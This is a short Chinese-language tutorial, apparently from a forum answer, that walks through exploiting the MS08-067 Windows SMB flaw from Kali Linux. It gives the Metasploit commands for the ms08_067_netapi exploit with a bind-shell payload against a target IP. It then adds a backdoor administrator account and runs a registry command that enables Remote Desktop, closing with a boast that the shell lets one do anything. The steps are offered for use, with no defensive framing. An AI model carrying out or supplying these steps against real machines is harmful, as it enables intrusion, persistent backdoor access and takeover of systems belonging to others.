kalilinux攻擊漏洞MS08？

1,在Kali用命令 msfconsole 開啟Metasploit （在終端里輸入msfconsole）。

2，然后運行命令：use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程序

set LHOST 192.168.116.3 #設置本地主機IP

set RHOST 192.168.116.116 #設置目標主機IP

set payload windows/shell_bind_tcp #設置payload

show options #查看設置信息

exploit #實施攻擊

3，添加用戶名為zeal，密碼為zeal的用戶，并把zeal用戶添加到管理組。接下來執行命令 netstat -an 看一下目標主機開放端口的情況。

4，發現并沒有開啟3389（遠程桌面連接端口），我們需要手動開啟。需要執行命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

有了目標主機的cmdshell你想做什么不行吧？好了演示到此完畢！